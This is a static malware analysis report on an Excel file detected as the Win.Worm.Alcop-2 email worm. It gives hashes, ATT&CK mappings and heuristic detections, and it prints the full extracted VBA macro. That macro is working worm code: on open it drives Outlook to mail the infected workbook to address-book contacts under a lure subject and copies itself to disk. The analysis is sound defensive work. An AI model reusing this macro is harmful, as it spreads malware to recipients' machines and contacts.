Win.Worm.Alcop-2 — Office (OLE) / .XLS malware analysis

Static analysis result for SHA-256 9b99ba8275e2ce62…

MALICIOUS

Office (OLE) / .XLS

22.0 KB Created: 2002-11-21 02:10:05 Authoring application: Microsoft Excel First seen: 2026-06-24
MD5: 0fd6e2cc3c1a247a1db959644851fe3d SHA-1: a30948e9f235879515797274d19e3044d2ff5001 SHA-256: 9b99ba8275e2ce6201679d08359ba69171a371156d31a963a375cfb4b7c4b60a
248 Risk Score

Malware Insights

Win.Worm.Alcop-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1041 Exfiltration Over C2 Link

The VBA macro contains a Workbook_Open subroutine that uses CreateObject to interact with Outlook. It harvests recipients from the MAPI address book, composes an email with the subject 'Nice Embedded Object' and body 'Check out the embedded object in the excel sheet...', attaches the current workbook, and sends it. It also copies itself to 'c:\topsecret.xls'. This behavior is consistent with a self-replicating email worm.

Heuristics 5

  • ClamAV: Win.Worm.Alcop-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Worm.Alcop-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATION
    VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.
    Matched line in script
    Set c = a.CreateItem(0)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set a = CreateObject("Outlook.Application")
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2150 bytes
SHA-256: e171ced100fe4d6cab1768ea1eec70ec304cc09b6eb0eb93d54411cdea433a8f
Detection
ClamAV: Win.Worm.Alcop-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
On Error Resume Next
Dim a, b, y, d, x, c, e, oo, fso, f, j
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
If x > 101 Then oo = d.AddressEntries.Count
Next oo
c.Subject = "Nice Embedded Object"
c.Body = "Check out the embedded object in the excel sheet..."
c.attachments.Add ActiveWorkbook.FullName
c.Send
e = ""
Next y
b.Logoff
End If
Worksheets(1).Shapes(1).OLEFormat.Activate
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(ActiveWorkbook.FullName)
f.Copy ("c:\topsecret.xls")
Set j = Assistant.NewBalloon
With j
.Heading = "alcopaul says"
.Text = "E-mail me..."
returnValue = .Show
End With
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.